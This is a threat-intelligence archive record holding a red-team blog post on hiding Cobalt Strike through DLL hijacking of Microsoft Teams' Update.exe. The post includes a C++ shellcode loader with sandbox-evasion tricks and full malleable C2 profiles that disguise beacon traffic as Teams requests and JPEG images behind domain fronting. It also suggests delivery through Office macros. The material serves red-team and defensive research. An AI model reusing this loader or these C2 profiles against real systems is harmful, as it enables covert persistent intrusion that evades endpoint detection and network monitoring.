{
	"id": "a1f34016-7152-4131-909c-c6fdd4a3ebdc",
	"created_at": "2026-04-06T00:16:38.850671Z",
	"updated_at": "2026-04-10T13:12:55.661868Z",
	"deleted_at": null,
	"sha1_hash": "e1af2b17027d82cbea216389244844fe09357988",
	"title": "Leveraging Microsoft Teams to cover up Cobalt Strike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1089161,
	"plain_text": "Leveraging Microsoft Teams to cover up Cobalt Strike\r\nBy Administrador\r\nPublished: 2021-05-14 · Archived: 2026-04-05 22:56:09 UTC\r\nTable of Contents\r\nIntroduction\r\nCobalt Strike persistence via DLL Hijacking\r\nHiding communications with the C\u0026C\r\nStager: obtaining the Cobalt Strike beacon\r\nBeacon: obtaining tasks\r\nBeacon: sending results\r\nConclusion\r\nIntroduction\r\nDuring a recent Red Team operation, we got local admin privileges on a workstation where an EDR solution was\r\nidentified. In this scenario, the next step to proceed with the engagement was to infect and persist on the\r\ncompromised system, in order to secure remote access. After exploring several options, a Microsoft Teams binary\r\nwas identified as vulnerable to DLL Hijacking.\r\nThis article explains how to take advantage of this situation, making use of a Cobalt Strike payload embedded in\r\na DLL. Finally, it details how to mimic legitimate Microsoft Teams traffic when communicating with the C\u0026C\r\nusing Cobalt Strike malleable C2 profiles.\r\nCobalt Strike persistence via DLL Hijacking\r\nIn order to ease the process, the Red Team prepared a local environment, as close as possible to the original, to\r\ncarry out the appropriate tests. After that, we used Process Monitor to identify processes trying to load non-existent DLLs. To do so, the following filters were applied:\r\nColumn | Relation | Value | Action\r\nResult | is | NAME NOT FOUND | Include\r\nPath | ends with | .dll | Include\r\nThe process “Update.exe” (32-bit) was spotted trying to load “CRYPTSP.dll” from the executable directory,\r\nfailing to do so as this library is located in C:\\Windows\\SysWOW64. This means that if a malicious DLL is placed\r\nin the same directory as the binary, the next time “Update.exe” is started, the process will load this library first and\r\nmake use of some exported functions. 
\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 1 of 8\n\nThis executable was an ideal candidate for the operation for different reasons:\r\nIt is an app update manager (Squirrel), present in the installation of multiple products (Teams, Slack, Discord,\r\nWebex). In this case, it is part of Microsoft Teams, so it is signed by Microsoft.\r\nIt is executed every time the user opens the application.\r\nThe default installation sets a Run key in the Windows registry so that the application is automatically\r\nlaunched every time the user logs in.\r\nIt is expected to make regular HTTP connections to the Internet, providing a way to camouflage the\r\ncommunications with a C\u0026C.\r\nVulnerable binary detection\r\nAfter the target has been selected, the Red Team needs to implement a DLL that executes malicious code (in this\r\ncase, a Cobalt Strike payload). To accomplish this, the binary was debugged placing breakpoints on all imported\r\nfunctions to check which of them was being invoked first at “CRYPTSP.dll”.\r\nCryptAcquireContextW() breakpoint\r\nThis showed that CryptAcquireContextW() is the first function being called by “Update.exe”, so the Red Team\r\ndeveloped a library that exports this function with a customized loader that recovers and executes the raw Cobalt\r\nStrike payload (shellcode) from disk. 
A more transparent alternative would be to create a wrapper using DLL\r\nProxying techniques.\r\nextern \"C\" {\r\n void __declspec(dllexport) CryptAcquireContextW() {\r\n char payload[PSIZE];\r\n \r\n // Mutex management\r\n HANDLE hMutex = CreateMutex(NULL, FALSE, TEXT(\"WindowsProc\"));\r\n if (hMutex != NULL)\r\n if (GetLastError() == ERROR_ALREADY_EXISTS)\r\n ExitProcess(1);\r\n \r\n // Garbage math operations\r\n stale();\r\n \r\n // Recover payload from file\r\n if(decrypt_shellcode_from_file(payload, PAYLOAD_PATH) == SUCCESS){\r\n \r\n // Launch Teams.exe\r\n execute_Teams();\r\n \r\n // Shellcode execution\r\n HANDLE hFileMap = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0\r\n LPVOID lpMapAddress = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0,\r\n memcpy((PVOID)lpMapAddress, payload, sizeof(payload));\r\n \r\n __asm\r\n {\r\n mov eax, lpMapAddress\r\n push eax;\r\n ret\r\n }\r\n }\r\n \r\n ReleaseMutex(hMutex);\r\n CloseHandle(hMutex);\r\n }\r\n}\r\nIn this case, the exported function performs the following actions:\r\n1. Use of a Mutex to halt execution if the payload has already been executed.\r\n2. stale() function call to evade some Machine Learning and Sandboxing checks.\r\n3. Shellcode retrieval and decryption from disk.\r\n4. Teams.exe execution to mimic Update.exe's legitimate behaviour.\r\n5. Shellcode execution via the CreateFileMapping + MapViewOfFile + memcpy technique.\r\nHiding communications with the C\u0026C\r\nDue to the restrictions of the environment, in which Internet connectivity was only allowed to Microsoft domains,\r\nDomain Fronting was used alongside customized Cobalt Strike profiles. 
These settings provide a flexible way of\r\nbuilding the HTTP requests and responses to communicate with the C\u0026C.\r\nThe Red Team used this functionality to hide the agent’s communication, mimicking the HTTP traffic issued by\r\nMicrosoft Teams. In this case, a staged payload was used, which is divided into two parts: the stager and the stage.\r\nThe first, smaller one, is responsible for obtaining the second C\u0026C stage: a DLL containing all the agent’s logic (a\r\nbeacon in Cobalt Strike terms) that is going to be reflectively loaded into memory. By using this type of payload,\r\nthe communication flows with the C\u0026C could be categorized into 3 types:\r\n1. Initial request to get the Cobalt DLL.\r\n2. Implant request to obtain tasks.\r\n3. Implant request to send tasks results.\r\nStager: obtaining the Cobalt Strike beacon\r\nThe http-stager section defines how to retrieve the beacon, where the stager request simulates an image download,\r\nmaking use of Microsoft Teams’ own HTTP headers. The response appears to be a legitimate picture, but contains\r\nthe beacon DLL. 
In order to achieve this, a well-formed JPEG header and trailing bytes are used.\r\nhttp-stager {\r\n set uri_x86 \"/v1/objects/0-neu-d10-ccab474e582c03325f9f07ba8a3aae8a/views/imgo\";\r\n set uri_x64 \"/v1/objects/0-neu-d10-cdab424e592c03253f9f07ba8d9aae8a/views/imgo\";\r\n client {\r\n header \"Host\" \"\u003cEndpoint Azure\u003e\";\r\n header \"x-mx-client-version\" \"27/1.0.0.2021020410\";\r\n header \"Origin\" \"https://teams.microsoft\";\r\n parameter \"v\" \"1\";\r\n }\r\n server {\r\n header \"Server\" \"Microsoft-IIS/10.0\";\r\n header \"strict-transport-security\" \"max-age=31536000; includeSubDomains\";\r\n header \"X-Powered-By\" \"ARR/3.0\";\r\n header \"X-Content-Type-Options\" \"nosniff\";\r\n header \"x-ms-environment\" \"North Europe-prod-3,_cnsVMSS-6_26\";\r\n header \"x-ms-latency\" \"40018.2038\";\r\n header \"Timing-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Credentials\" \"true\";\r\n header \"Connection\" \"close\";\r\n header \"Content-Type\" \"image/jpeg\";\r\n output {\r\n prepend \"\\xFF\\xD8\\xFF\\xE0\\x00\\x10\\x4A\\x46\\x49\\x46\\x00\\x01\\x01\\x01\\x00\\x48\\x00\\x48\\x00\\x00\r\n append \"\\xF9\\x7C\\xF3\\x4E\\x3F\\xEC\\x7F\\x82\\x8C\\xA4\\xB5\\x5B\\x3E\\x64\\x11\\xE7\\xEA\\x78\\x70\\xCD\\\r\n print;\r\n }\r\n }\r\n}\r\nObtaining the payload\r\nThis way, tools like Wireshark will identify the content of the HTTP response as a JPEG image.\r\nWireshark shows the reply as a JPEG file\r\nBeacon: obtaining tasks\r\nThe following part of the profile is used to define the format of the periodic requests in which the Cobalt Strike agent\r\nasks for new tasks to be executed. These requests use the “events” GET parameter to send base64-encoded session\r\ninformation. 
As we saw before, the information encoded by the server is embedded into responses that appear to\r\nbe legitimate.\r\nhttp-get {\r\n set uri \"/Collector/2.0/settings/\";\r\n client {\r\n header \"Accept\" \"json\";\r\n header \"Host\" \"\u003cEndpoint Azure\u003e\";\r\n header \"Referer\" \"https://teams.microsoft.com/_\";\r\n header \"x-ms-session-id\" \"f73c3186-057a-d996-3b63-b6e5de6ef20c\";\r\n header \"x-ms-client-type\" \"desktop\";\r\n header \"x-mx-client-version\" \"27/1.0.0.2021020410\";\r\n header \"Accept-Encoding\" \"gzip, deflate, br\";\r\n header \"Origin\" \"https://teams.microsoft.com\";\r\n \r\n parameter \"qsp\" \"true\";\r\n parameter \"client-id\" \"NO_AUTH\";\r\n parameter \"sdk-version\" \"ACT-Web-JS-2.5.0\u0026\";\r\n \r\n metadata {\r\n base64url;\r\n parameter \"events\";\r\n }\r\n }\r\n server {\r\n header \"Content-Type\" \"application/json; charset=utf-8\";\r\n header \"Server\" \"Microsoft-HTTPAPI/2.0\";\r\n header \"X-Content-Type-Options\" \"nosniff\";\r\n header \"x-ms-environment\" \"North Europe-prod-3,_cnsVMSS-6_26\";\r\n header \"x-ms-latency\" \"40018.2038\";\r\n header \"Access-Control-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Credentials\" \"true\";\r\n header \"Connection\" \"keep-alive\";\r\n \r\n output {\r\n netbios;\r\n prepend \"{\\\"next\\\":\\\"https://westeurope-prod-3.notifications.teams.microsoft.com/users/8\r\n append \"/events/poll?cursor=1613554385\u0026epfs=srt\u0026sca=4}\";\r\n print;\r\n }\r\n }\r\n}\r\nSending commands\r\nBeacon: sending results\r\nFinally, the http-post block specifies the format of the result requests sent from the agent to the C\u0026C. 
For this\r\nexample, the output is inside the Authentication HTTP header, pretending to be a JWT authentication token.\r\nhttp-post {\r\n set verb \"GET\";\r\n set uri \"/users/8:orgid:b1a28-a1c3-3d54-4eb01adb1/endpoints/events/poll\";\r\n client {\r\n header \"Accept\" \"json\";\r\n header \"Host\" \"\u003cEndpoint Azure\u003e\";\r\n header \"Referer\" \"https://teams.microsoft.com/_\";\r\n header \"x-ms-query-params\" \"cursor=1613554385\u0026epfs=srt\u0026sca=5\u0026activeTimeout=135\";\r\n header \"x-ms-client-type\" \"desktop\";\r\n header \"x-mx-client-version\" \"27/1.0.0.2021020410\";\r\n header \"Accept-Encoding\" \"gzip, deflate, br\";\r\n header \"Origin\" \"https://teams.microsoft\";\r\n output {\r\n base64;\r\n prepend \"skypetoken=eyJhbGciOi\";\r\n header \"Authentication\";\r\n }\r\n id {\r\n netbios;\r\n prepend \"f73c3186-057a-d996-3b63-\";\r\n header \"x-ms-session-id\";\r\n }\r\n }\r\n server {\r\n header \"Content-Type\" \"application/json; charset=utf-8\";\r\n header \"Server\" \"Microsoft-HTTPAPI/2.0\";\r\n header \"X-Content-Type-Options\" \"nosniff\";\r\n header \"x-ms-environment\" \"North Europe-prod-3,_cnsVMSS-6_26\";\r\n header \"x-ms-latency\" \"40018.2038\";\r\n header \"Access-Control-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Credentials\" \"true\";\r\n header \"Connection\" \"keep-alive\";\r\n \r\n output {\r\n netbios;\r\n prepend \"{\\\"next\\\":\\\"https://westeurope-prod-3.notifications.teams.microsoft.com/users/8\r\n append \"/events/poll?cursor=1613554385\u0026epfs=srt\u0026sca=4}\";\r\n print;\r\n }\r\n }\r\n}\r\nSending results\r\nConclusion\r\nThis article shows how an attacker could take advantage of DLL Hijacking vulnerabilities in services to execute\r\nmalicious code through signed binaries, mimicking the traffic of the corresponding legitimate application 
to\r\nminimize the chances of being detected. It should be noted that this technique can also be useful in social\r\nengineering exercises, in which deploying the malicious DLL through Microsoft Office macros in any application\r\ndirectory that uses this app update manager would be sufficient, without needing to directly inject or execute any\r\npayload.\r\nhttps://www.youtube.com/watch?v=1F6-j6dQtU0\r\nSource: https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/"
	],
	"report_names": [
		"leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434598,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e1af2b17027d82cbea216389244844fe09357988.pdf",
		"text": "https://archive.orkl.eu/e1af2b17027d82cbea216389244844fe09357988.txt",
		"img": "https://archive.orkl.eu/e1af2b17027d82cbea216389244844fe09357988.jpg"
	}
}